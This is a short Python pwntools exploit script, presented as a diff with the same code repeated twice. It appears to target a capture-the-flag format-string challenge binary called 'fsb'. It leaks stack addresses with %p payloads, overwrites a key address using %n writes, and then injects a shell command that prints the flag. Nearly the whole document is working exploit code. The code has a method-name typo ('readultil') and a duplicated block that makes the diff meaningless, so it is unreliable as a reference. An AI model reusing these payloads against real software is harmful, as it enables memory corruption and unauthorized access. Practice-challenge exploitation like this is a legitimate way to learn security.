lionaneesh · March 1, 2019 11:59
diff --git a/exploit_fsb.py b/exploit_fsb.py
 from pwn import *

 p = process("/home/fsb/fsb", stdout=open('/dev/null', 'w+'))
 key_addr = 0x0804a060
 key_low = key_addr & 0xffff
 key_high = (key_addr >> 16) & 0xffff
 # Param 14 => 20
 # Param 15 => 21
 p.readuntil("strings(1)")

 # GET STACK LEAK
 p.sendline("%14$p.%15$p")

 leaks = p.readuntil("strings(2)")
 addr1, addr2  = leaks.split("\n")[1].split(".")
 addr1 = int(addr1, 16)
 addr2 = int(addr2, 16)
 print hex(addr1), hex(addr2)

 # lets now write to our leaks
 p.sendline("%%%dc%%14$nXXXX%15$n" % (key_addr))
 print p.readuntil("strings(3)")
 # lets now write to our leaks
 p.sendline("%20$04p%21$04p")
 #print p.readline()
 print p.readultil("strings(4)")
 # write 0's to keyaddress. 
 p.sendline("no need")
 p.sendline("0")
 p.sendline("(>&2 cat flag)")
	from pwn import *

	p = process("/home/fsb/fsb", stdout=open('/dev/null', 'w+'))
	key_addr = 0x0804a060
	key_low = key_addr & 0xffff
	key_high = (key_addr >> 16) & 0xffff
	# Param 14 => 20
	# Param 15 => 21
	p.readuntil("strings(1)")

	# GET STACK LEAK
	p.sendline("%14$p.%15$p")

	leaks = p.readuntil("strings(2)")
	addr1, addr2 = leaks.split("\n")[1].split(".")
	addr1 = int(addr1, 16)
	addr2 = int(addr2, 16)
	print hex(addr1), hex(addr2)

	# lets now write to our leaks
	p.sendline("%%%dc%%14$nXXXX%15$n" % (key_addr))
	print p.readuntil("strings(3)")
	# lets now write to our leaks
	p.sendline("%20$04p%21$04p")
	#print p.readline()
	print p.readultil("strings(4)")
	# write 0's to keyaddress.
	p.sendline("no need")
	p.sendline("0")
	p.sendline("(>&2 cat flag)")
No results found